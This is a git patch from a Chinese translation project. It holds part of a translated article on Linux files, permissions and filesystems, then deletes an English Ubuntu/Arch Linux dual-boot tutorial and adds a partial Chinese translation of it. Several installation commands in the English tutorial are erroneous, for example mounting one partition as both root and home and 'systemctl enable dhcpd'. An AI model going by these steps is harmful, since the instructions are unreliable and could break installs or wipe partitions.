-每个保存有文件和目录的介质都有一个文件系统在上面。不同的介质类型可能使用了为它优化过的特定的文件系统。比如,CD-ROMs 使用 ISO9660 或者 UDF 文件系统类型。USB 便携式驱动器一般使用 FAT32,以便于它们可以很容易去与其它计算机系统共享。
-
-Windows 也使用文件系统。不过,我们不过多的讨论它。例如,当你插入一个 CD-ROM,Windows 将读取 ISO9660 文件系统结构,分配一个盘符给它,然后,在盘符(比如,D:\)下显示文件和目录。当然,如果你深究细节,从技术角度说,Windows 是分配一个盘符给一个文件系统,而不是整个驱动器。
-
-使用同样的例子,Linux 也读取 ISO9660 文件系统结构,但它不分配盘符,它附加文件系统到一个目录(这个过程被称为加载)。Linux 将随后在附加的目录(比如是, _/media//cdrom_ )下显示 CD-ROM 上的文件和目录。
-
-因此,在 Linux 上回答 “我的 C:\ 在哪里?” 这个问题,答案是,这里没有 C:\,它们工作方式不一样。
-
-### 文件
-
-Windows 在它的文件系统中存在文件和目录(也被称为文件夹)。但是,Linux 也让你将其它的东西放到文件系统中。这些其它类型的东西是文件系统的原生的对象,并且,它们和普通文件实际上是不同的。除普通文件和目录之外,Linux 还允许你去创建和使用硬链接、符号链接、命名管道、设备节点、和套接字。在这里,我们不展开讨论所有的文件系统对象的类型,但是,这里有几种经常使用到的。
-
-硬链接是用于为文件创建一个或者多个别名。指向磁盘上同样内容的每个别名的名字是不同的。如果在一个文件名下编辑文件,这个改变也同时出现在其它的文件名上。例如,你有一个 _MyResume_2017.doc_,它还一个被称为 _JaneDoeResume.doc_ 的硬链接。(注意,硬链接是从命令行下,使用 _ln_ 的命令去创建的)。你可以找到并编辑 _MyResume_2017.doc_,然后,然后找到 _JaneDoeResume.doc_,你发现它保持了跟踪 -- 它包含了你所有的更新。
-
-符号链接有点像 Windows 中的快捷方式。文件系统的入口包含一个到其它文件或者目录的路径。在很多方面,它们的工作方式和硬链接很相似,它们可以创建一个到其它文件的别名。但是,符号链接也可以像文件一样给目录创建一个别名,并且,符号链接可以指向到不同介质上的不同文件系统,而硬链接做不到这些。(注意,你可以使用带 _-s_ 选项的 _ln_ 命令去创建一个符号链接)
-
-### 权限
-
-另一个很大的区别是文件系统对象上在 Windows 和 Linux 之中涉及的权限(文件、目录、及其它)。Windows 在文件和目录上实现了一套非常复杂的权限。例如,用户和用户组可以有权限去读取、写入、运行、修改、等等。用户和用户组可以授权访问除例外以外的目录中的所有内容,也可以不允许访问除例外的目录中的所有内容。
-
-然而,大多数使用 Windows 的人并不去使用一个特定的权限;因此,当他们发现使用一套权限并且在 Linux 上是强制执行的,他们感到非常惊讶!Linux 通过使用 SELinux 或者 AppArmor 可以强制执行一套更复杂的权限。但是,大多数 Linux 安装版都使用了内置的默认权限。
-
-在默认的权限中,文件系统中的每个条目都有一套为它的文件所有者、文件所在的组、和其它人的权限。这些权限允许他们:读取、写入、和运行。给它们的权限有一个层次。首先,它检查这个(登入的)用户是否为该文件所有者和它拥有的权限。如果不是,然后检查这个用户是否在文件所在的组中和它拥有的权限。如果不是,然后它再检查其它人拥有的权限。这里设置了其它人的权限。但是,这里设置的三套权限大多数情况下都会使用其中的一套。
-
-如果你使用命令行,你输入 `ls -l`,你可以看到如下所表示的权限:
-
-```
-rwxrw-r-- 1 stan dndgrp 25 Oct 33rd 25:01 rolldice.sh
-```
-
-最前面的字母,`rwxrw-r--`,展示了权限。在这个例子中,所有者(stan)可以读取、写入、和运行这个文件(前面的三个字母,rwx);dndgrp 组的成员可以读取和写入这个文件,但是不能运行(第二组的三个字母,rw-);其它人仅可以读取这个文件(最后的三个字母,r--)。
-
-(注意,在 Windows 中去生成一个可运行的脚本,你生成的文件有一个特定的扩展名,比如 .bat,而在 Linux 中,扩展名在操作系统中没有任何意义。而是需要去设置这个文件可运行的权限)
-
-如果你收到一个 _permission denied_ 错误,可能是你去尝试运行了一个要求管理员权限的程序或者命令,或者你去尝试访问一个你的帐户没有访问权限的文件。如果你尝试去做一些要求管理员权限的事,你必须切换登入到一个被称为 _root_ 的用户帐户。或者通过使用一个命令行的被称为 _sudo_ 的助理程序。它可以临时允许你以 _root_ 权限运行。当然,_sudo_ 工具,也会要求你输入密码,以确保你真的有权限。
-
-### 硬盘文件系统
-
-Windows 主要使用一个被称为 `NTFS` 的硬盘文件系统。在 Linux 上,你也可以选一个你希望去使用的硬盘文件系统。不同的文件系统类型呈现不同的特性和不同的性能特征。主要的原生 Linux 的文件系统,现在使用的是 Ext4。但是,在安装 Linux 的时候,你可以有丰富的文件系统类型可供选择,比如,Ext3(Ext4 的前任)、XFS、Btrfs、UBIFS(用于嵌入式系统)、等等。如果你不确定要使用哪一个,Ext4 是一个很好的选择。
-
- _通过来自 Linux 基金会和 edX 的 ["Linux 介绍"][2] 上免费学习更多的 Linux 课程。_
-
---------------------------------------------------------------------------------
-
-via: https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems
-
-作者:[JOHN BONESIO][a]
-译者:[qhwdw](https://github.com/qhwdw)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.linux.com/users/johnbonesio
-[1]:https://www.linux.com/licenses/category/creative-commons-zero
-[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
-[3]:https://www.linux.com/files/images/butterflies-8075511920jpg
-[4]:https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction
From 6110544572d954ffd548f4ae58b78e4e6c3f107d Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Sun, 7 Jan 2018 17:07:06 +0800
Subject: [PATCH 138/371] Translated by stevenzdg988
---
...0171228 Dual Boot Ubuntu And Arch Linux.md | 369 ------------------
...0171228 Dual Boot Ubuntu And Arch Linux.md | 299 ++++++++++++++
2 files changed, 299 insertions(+), 369 deletions(-)
delete mode 100644 sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
create mode 100644 translated/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
diff --git a/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md b/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
deleted file mode 100644
index adff25c6b6..0000000000
--- a/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
+++ /dev/null
@@ -1,369 +0,0 @@
-Translating by stevenzdg988
-
-Dual Boot Ubuntu And Arch Linux
-======
-![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dual-boot-ubuntu-and-arch-linux_orig.jpg)
-
-**Dual booting Ubuntu and Arch Linux** is not as easy as it sounds, however, I’ll make the process as easy as possible with much clarity. First, we will need to install Ubuntu then Arch Linux since it's much easier configuring the Ubuntu grub to be able to **dual boot Ubuntu and Arch Linux**
-
-### Dual Boot Ubuntu And Arch Linux
-
-Some of the things you will need:
-
-1. Ubuntu flavor of your choice, in this case, I’ll use ubuntu 17.10 iso
-
-2. 2 USB sticks
-
-3. Windows PC or Linux based PC
-
-4. Arch Linux iso
-
-5. Rufus(for windows) or etcher(for Linux distro)
-
-### Install Ubuntu 16.10
-
-First, [create a bootable flash drive][1] using Rufus for both Ubuntu and Arch Linux. Alternatively, you could use etcher to create bootable flash drives for both Ubuntu and Arch Linux.
-
- [![bootable ubuntu usb etcher image writer](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bootable-ubuntu-usb-etcher-image-writer_orig.jpg)][2]
-
-Select the ISO image file for Ubuntu then select the flash drive of your choice after which click flash to create the bootable flash drive. Wait till it completes and Voila! Your bootable flash drive is ready for use.
-
- [![make ubuntu usb bootable in linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-ubuntu-usb-bootable-in-linux_orig.jpg)][3]
-
-Turn on your machine and boot using the bootable flash drive with the Ubuntu installation media. Ensure that you boot into UEFI or BIOS compatibility mode depending on the type of PC you are using. I prefer using UEFI for a newer PC builds.
-
- [![live ubuntu boot](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/live-ubuntu-boot_orig.jpg)][4]
-
-Upon Successful boot, you will see the following screen asking you to try Ubuntu or install Ubuntu. Choose install Ubuntu.
-
- [![install usb from live usb](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-usb-from-live-usb_orig.jpg)][5]
-
-Then check install third-party software for graphics and Wifi hardware, MP3 and other media. Optionally if you have an internet connection choose download updates while installing Ubuntu since it will save time setting up the installation as well as ensure you get the latest updates of your installation.
-
- [![custom partition hd install ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/custom-partition-hd-install-ubuntu_orig.jpg)][6]
-
-Then choose ‘Something else’ so that we can partition the hard disk and set aside space for swap, Ubuntu, and Archlinux.
-
- [![create swap partition ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-swap-partition-ubuntu_orig.jpg)][7]
-
-Create a swap area partition. Preferably half the size of the ram. In my case, I have 1GB of ram thus 512mb of swap area space.
-
- [![install ubuntu root partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-root-partition_orig.jpg)][8]
-
-Then create a partition with mount point ‘/’. Then click the install now button.
-
- [![select ubuntu timezone](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-ubuntu-timezone_orig.jpg)][9]
-
-Choose your location then choose language and keyboard settings.
-
- [![select ubuntu keyboard layout](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-select-location-keyboard-layout_orig.jpg)][10]
-
-Then create the user credentials that will create a new user.
-
- [![create username, system name ubuntu install](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-username-system-name-ubuntu-install_orig.jpg)][11]
-
-The installation will now start by clicking next.
-
- [![ubuntu installation finishing](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finishing_orig.jpg)][12]
-
-When the installation is done click on restart PC.
-
- [![ubuntu installation finished restart system](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finished_orig.jpg)][13]
-
-Remove the installation media and press enter when done.
-
- [![remove installation media after ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/remove-installation-media-after-ubuntu_orig.jpg)][14]
-
-Upon confirmation of successful installation, restart and boot into the Arch Linux installation media.
-
-### Install Arch Linux
-
-Upon booting into the
-
-**Arch Linux installation media**
-
-you should see an initial screen as follows. Choose Boot Arch Linux(x86_64). Note Arch Linux is a more of
-
-[DYF][15]
-
-(do it yourself) kind of Operating system.
-
- [![arch linux installation boot menu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-installation-boot-menu_orig.jpg)][16]
-
-After choosing, it will open a tty1 terminal that you will use to install the operating system.
-
- [![arch linux tty1 linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-tty1-linux_orig.png)][17] Note: You will need an internet connection to download some packages in order to install Arch Linux successfully. So we need to check if the internet is working fine. Enter the following into the terminal to check internet connectivity.
-
-ping linuxandubuntu.com -c 4
-
- [![arch linux ping check internet connection](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-ping-check-internet-connection_orig.png)][18]
-
-If the internet is working fine you should get an echo back showing the number of packets sent and received. In this case, we sent 4 echos and got 4 back meaning the connection is good.
-
-If you want to setup Wifi in Arch Linux, read this post
-
-[here][19]
-
-on setting up Wifi in Arch Linux.
-
-Next, we need to select the partition that’s free that we had earlier set aside while installing Ubuntu.
-
-fdisk -l
-
-The above should show you the available disks that are there. You should see the Ubuntu partitions as well as the free space. We will use cfdisk to partition.
-
-cfdisk
-
- [![install arch partition disk with cfdisk](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-partition-disk-with-cfdisk_orig.png)][20]
-
-You will see the partitions. Select the free space that is below the other allocated partitions.
-
-You will need to select new and then enter the partition size for the partition.
-
- [![partition free space swap arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/partition-free-space-swap-arch-linux_orig.png)][21] Use for example 9.3G - G representing gigabytes. [![install arch linux partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-partition_orig.png)][22]
-
-Make the partition primary as below.
-
- [![make arch linux root as primary partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-arch-linux-root-as-primary-partition_orig.png)][23] Then choose the write partition entry. [![select partition to install arch](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-partition-to-install-arch_orig.png)][24]
-
-Type ‘yes’ to confirm the writing of the partition.
-
- [![install arch linux confirm create partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-confirm-create-partition_orig.png)][25]
-
-Then choose the quit option.
-
- [![quit cfdisk arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/quit-cfdisk-arch-linux_orig.png)][26] Then type:
-
-fdisk -l
-
-To confirm the changes
-
- [![confirm partition changes](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/confirm-partition-changes_orig.png)][27]
-
-Then partition the disk using:
-
-mkfs.ext4 /dev/sda3
-
-Make sure the partition you choose is the last one that we created so that we don’t mess with the Ubuntu partition.
-
- [![complete arch linux installation partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/complete-arch-linux-installation-partition_orig.png)][28]
-
-Then mount it to using the following command -
-
-mount /dev/sda3 /mnt
-
- [![mount base partition in arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/mount-base-partition-in-arch-linux.png?1514472693)][29]
-
-Make a home directory using:
-
-mkdir .mnt/home
-
- [![mount home partition arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/mount-home-partition-arch-linux.png?1514472866)][30]
-
-Mount the home folder to the partition using
-
-mount /dev/sda3 /mnt/home
-
- [![make mount home directory](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/make-mount-home-directory.png?1514472960)][31]
-
-Now install the base system of Archlinux using the command:
-
-pacstrap /mnt base
-
-Make sure you have an internet connection.
-
-
-
-It should take a while to download and set it up depending on the internet speed you have.
-
- [![install arch linux base](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/install-arch-linux-base.png?1514473056)][32]
-
-After the step is complete, the Archlinux base installation is completed.
-
-After installing the Arch Linux base, create a fstab file using the command:
-
-genfstab -U /mnt >> /mnt/etc/fstab
-
- [![create fstab in arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/create-fstab-file-in-arch-linux.png?1514473226)][33]
-
-After that you need to verify the fstab file entries using:
-
-cat /mnt/etc/fstab
-
- [![cat fstab file data terminal](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/cat-fstab-file-data-terminal.png?1514473304)][34]
-
-### Configuring Arch Linux: the basic configuration
-
-You will need to configure the following upon installation:
-
-1. The system language and the system locales
-
-2. The system timezones
-
-3. Root user password
-
-4. Set a hostname
-
-Firstly, you will need to switch to the newly installed base by changing root into the system using the command:
-
-arch-chroot /mnt
-
-#### The system Language and the system locale
-
-You will then have to configure the system language. You will have to uncomment en_UTF-8 UTF-8 and the localization you need in /etc/local.gen
-
-Type:
-
-nano /etc/local.gen
-
-Then uncomment the en_UTF-8 UTF-8
-
-Then type:
-
-locale-gen
-
-To generate the localization settings as follows:
-
- [![generate localization arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/generate-localization-arch-linux.png?1514473406)][35] You will need to set the LANG variable in locale.conf accordingly, for example:
-
-nano /etc/locale.conf
-
-Then change to:
-
-LANG=en_US.UTF-8
-
-If you set the keyboard layout, make the changes persistent in vconsole.conf:
-
-nano /etc/vconsole.conf
-
-Then change to:
-
-KEYMAP=us-eng
-
-#### 2\. The system timezones
-
-You will need to set the time zone using
-
-ln -sf /usr/share/zoneinfo/Region/City /etc/localtime
-
-To see the available time zones, you can use the following command in the terminal:
-
-Note region is shown in blue below in the screenshot:
-
-ls /usr/share/zoneinfo
-
- [![setup zonefile in arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/setup-zonefile-in-arch-linux.png?1514473483)][36] [![setup country zonefile](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/setup-country-zonefile_orig.png)][37] Run hwclock command as follows to generate /etc/adjtime(assumes the hardware clock is set to UTC.):
-
-# hwclock --systohc
-
-#### 3\. Root password
-
-To set a new password for the Arch Linux installation set root password using:
-
-Passwd
-
-Supply a new password and confirm the password to set the root password.
-
- [![setup arch linux root password](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/setup-arch-linux-root-password.png?1514473649)][38]
-
-#### 4\. Set a hostname and configure network
-
-You will need to create the hostname file:
-
-nano /etc/hostname
-
- [![set arch linux hostname](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/set-arch-linux-hostname.png?1514473741)][39]
-
-Change the name to your username:
-
- [![set arch linux username](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/set-arch-linux-username.png?1514473822)][40] Then add a matching entry to hosts:
-
-nano /etc/hosts
-
-127.0.0.1 localhost.localdomain localhost
-
-::1 localhost.localdomain localhost
-
-127.0.1.1 LinuxandUbuntu.localdomain LinuxandUbuntu
-
-
-
-You will need to make the network connections persistent thus use:
-
-systemctl enable dhcpd
-
-#### Grub configuration
-
-Then reboot the machine and enter into Ubuntu to configure the grub.
-
-You will type:
-
-reboot
-
- [![reboot system after arch linux installation](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/reboot-system-after-arch-linux-installation.png?1514474180)][41]
-
-The Arch Linux installation still doesn’t appear therefore we need to install it using update-grub in ubuntu.
-
- [![ubuntu grub menu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/ubuntu-grub-menu.png?1514474302)][42] Open a terminal in Ubuntu and type:
-
-sudo update-grub
-
-It should update the grub to include Arch Linux.
-
-### Conclusion
-
-Congratulations you have successfully set up Ubuntu and Arch Linux to dual boot. The Ubuntu installation is easy but the Arch Linux installation is a challenge for new Linux users. I tried making this tutorial as simple as it can be. But if you have any question on the article, let me know in the comment section below. Also share this article with your friends and help them learn Linux.
-
---------------------------------------------------------------------------------
-
-via: http://www.linuxandubuntu.com/home/dual-boot-ubuntu-and-arch-linux
-
-作者:[LinuxAndUbuntu][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.linuxandubuntu.com
-[1]:http://www.linuxandubuntu.com/home/etcher-burn-images-to-sd-card-make-bootable-usb
-[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bootable-ubuntu-usb-etcher-image-writer_orig.jpg
-[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-ubuntu-usb-bootable-in-linux_orig.jpg
-[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/live-ubuntu-boot_orig.jpg
-[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-usb-from-live-usb_orig.jpg
-[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/custom-partition-hd-install-ubuntu_orig.jpg
-[7]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-swap-partition-ubuntu_orig.jpg
-[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-root-partition_orig.jpg
-[9]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-ubuntu-timezone_orig.jpg
-[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-select-location-keyboard-layout_orig.jpg
-[11]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-username-system-name-ubuntu-install_orig.jpg
-[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finishing_orig.jpg
-[13]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finished_orig.jpg
-[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/remove-installation-media-after-ubuntu_orig.jpg
-[15]:http://www.linuxandubuntu.com/home/arch-linux-take-your-linux-knowledge-to-next-level-review
-[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-installation-boot-menu_orig.jpg
-[17]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-tty1-linux_orig.png
-[18]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-ping-check-internet-connection_orig.png
-[19]:http://www.linuxandubuntu.com/home/how-to-setup-a-wifi-in-arch-linux-using-terminal
-[20]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-partition-disk-with-cfdisk_orig.png
-[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/partition-free-space-swap-arch-linux_orig.png
-[22]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-partition_orig.png
-[23]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-arch-linux-root-as-primary-partition_orig.png
-[24]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-partition-to-install-arch_orig.png
-[25]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-confirm-create-partition_orig.png
-[26]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/quit-cfdisk-arch-linux_orig.png
-[27]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/confirm-partition-changes_orig.png
-[28]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/complete-arch-linux-installation-partition_orig.png
-[29]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mount-base-partition-in-arch-linux.png
-[30]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mount-home-partition-arch-linux.png
-[31]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/make-mount-home-directory.png
-[32]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/install-arch-linux-base.png
-[33]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/create-fstab-file-in-arch-linux.png
-[34]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/cat-fstab-file-data-terminal.png
-[35]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/generate-localization-arch-linux.png
-[36]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/setup-zonefile-in-arch-linux.png
-[37]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/setup-country-zonefile_orig.png
-[38]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/setup-arch-linux-root-password.png
-[39]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/set-arch-linux-hostname.png
-[40]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/set-arch-linux-username.png
-[41]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/reboot-system-after-arch-linux-installation.png
-[42]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/ubuntu-grub-menu.png
diff --git a/translated/tech/20171228 Dual Boot Ubuntu And Arch Linux.md b/translated/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
new file mode 100644
index 0000000000..dcb5e8afc6
--- /dev/null
+++ b/translated/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
@@ -0,0 +1,299 @@
+Ubuntu 和 Arch Linux 双启动
+======
+![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dual-boot-ubuntu-and-arch-linux_orig.jpg)
+
+**Ubuntu 和 Arch Linux 双启动**不像听起来那么容易,不过,我会让这个过程尽可能地简单明了。首先我们需要安装 Ubuntu,然后再安装 Arch Linux,因为在 Ubuntu 的 grub 中进行配置,更容易实现 **Ubuntu 和 Arch Linux 双启动**。
+
+### Ubuntu 和 Arch Linux 双启动
+
+你需要准备好以下内容:
+
+1、你需要准备你所选择的 Ubuntu 的特色版本,在这个例子中,我将使用 Ubuntu 17.10 ISO
+
+2、两个优盘
+
+3、Windows 或者 Linux 操作系统的 PC 机
+
+4、Arch Linux ISO
+
+5、Rufus(用于 Windows)或 etcher(用于 Linux 发行版)两款制作启动盘的软件之一,根据自己的系统类型来选择。
+
+### 安装 Ubuntu
+
+首先,利用 `Rufus` 为 Ubuntu 和 Arch Linux [创建可引导的闪存驱动器][1]。另外,也可以使用 `etcher` 为 Ubuntu 和 Arch Linux 创建可引导的闪存驱动器。
+
+ [![Ubuntu 可启动 USB 镜像写入工具](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bootable-ubuntu-usb-etcher-image-writer_orig.jpg)][2]
+
+为 Ubuntu 选择 ISO 映像文件,然后选择闪存驱动器,然后单击 `Flash` 创建可引导的闪存驱动器。等到它完成,瞧!你的启动闪存已经准备好使用了。
+ [![在 Linux 下创建可引导的 Ubuntu USB](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-ubuntu-usb-bootable-in-linux_orig.jpg)][3]
+
+
+打开你的机器,使用载有 Ubuntu 安装媒体的闪存驱动器进行启动。根据你所使用的 PC 的类型,确保引导到 UEFI 或 BIOS 兼容模式。对于较新的 PC,我更喜欢使用 UEFI 模式。
+ [![Ubuntu 自生系统登陆](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/live-ubuntu-boot_orig.jpg)][4]
+
+在成功启动后,您将看到如上图显示,要求您尝试 Ubuntu 或安装 Ubuntu,选择安装 Ubuntu。
+ [![从自生可启动 USB 安装](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-usb-from-live-usb_orig.jpg)][5]
+
+然后勾选为图形和 Wifi 硬件、MP3 及其他媒体安装第三方软件。另外,如果你有互联网连接,可以选择在安装 Ubuntu 时下载更新,这样既能节省安装后的设置时间,也能确保安装的是最新的更新。
+ [![自定义磁盘分区安装 Ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/custom-partition-hd-install-ubuntu_orig.jpg)][6]
+
+然后选择点击`Something else`,这样我们就可以对硬盘进行分区,并预留出 Ubuntu 和 Archlinux 的分区以及他们的交换分区的空间。
+ [![create swap partition ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-swap-partition-ubuntu_orig.jpg)][7]
+
+创建一个交换分区。最好是内存的一半大小。在我的例子中,我有 1 GB 的内存,因此创建一个 512 MB 的交换空间。
+ [![安装 Ubuntu 到根(/)分区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-root-partition_orig.jpg)][8]
+
+然后创建一个带有挂载点`/`的根分区并且点击`Install Now`按钮。
+ [![选择时区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-ubuntu-timezone_orig.jpg)][9]
+
+接下来选择语言和键盘设置。
+ [![选择键盘布局](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-select-location-keyboard-layout_orig.jpg)][10]
+
+然后创建新用户的用户凭据。
+ [![创建用户名, 系统名及安装](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-username-system-name-ubuntu-install_orig.jpg)][11]
+
+点击`Next`开始安装。
+ [![ubuntu installation finishing](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finishing_orig.jpg)][12]
+
+当安装完成后点击`Restart Now`重启 PC。
+ [![完成 Ubtuntu 安装并重启系统](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finished_orig.jpg)][13]
+
+移除安装媒介,按下回车继续。
+ [![移除安装媒介](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/remove-installation-media-after-ubuntu_orig.jpg)][14]
+
+在确认成功安装后,重新启动并利用 Arch Linux 安装媒介引导。
+### 安装 Arch Linux
+
+在引导到 **Arch Linux 安装媒体**时,您应该看到如下所示的初始屏幕。选择 `Boot Arch Linux(x86_64)`。注意,Arch Linux 更像是一种 [DIY][15](自己动手打造)的操作系统。
+ [![Arch Linux 安装引导菜单](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-installation-boot-menu_orig.jpg)][16]
+
+选择之后,它将打开一个`tty1`终端,您将使用它来安装操作系统。
+ [![tty终端](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-tty1-linux_orig.png)][17] 注意:为了成功安装 Arch Linux,您需要一个互联网连接来下载一些必须的系统安装包。所以我们需要检查一下互联网是否运行正常。输入以下命令到终端以检查网络连接。
+```ping linuxandubuntu.com -c 4```
+
+ [![检查互联网连接](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-ping-check-internet-connection_orig.png)][18]
+
+如果因特网连接正常,你应该会看到回显结果,其中显示了发送和接收的数据包数量。在本例中,我们发送了 4 个数据包并全部收到回应,这意味着连接是正常的。
+
+如果想在 Arch Linux 中设置 Wifi,请阅读[本文][19],在 Arch Linux 中配置 Wifi。
+
+接下来,我们需要选择之前在安装 Ubuntu 时预留出的空闲分区。
+
+```fdisk -l```
+
+上面的命令会列出可用的磁盘及其分区情况。您应该能看到 Ubuntu 的分区以及预留的空闲空间。接下来我们将使用 `cfdisk` 命令进行分区。
+```cfdisk```
+
+ [![利用cfdisk命令安装 Ach 分区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-partition-disk-with-cfdisk_orig.png)][20]
+
+执行命令后将看到分区情况。选择其他已分配分区下面的空闲空间。
+您需要选择 `New`,然后输入分区大小。
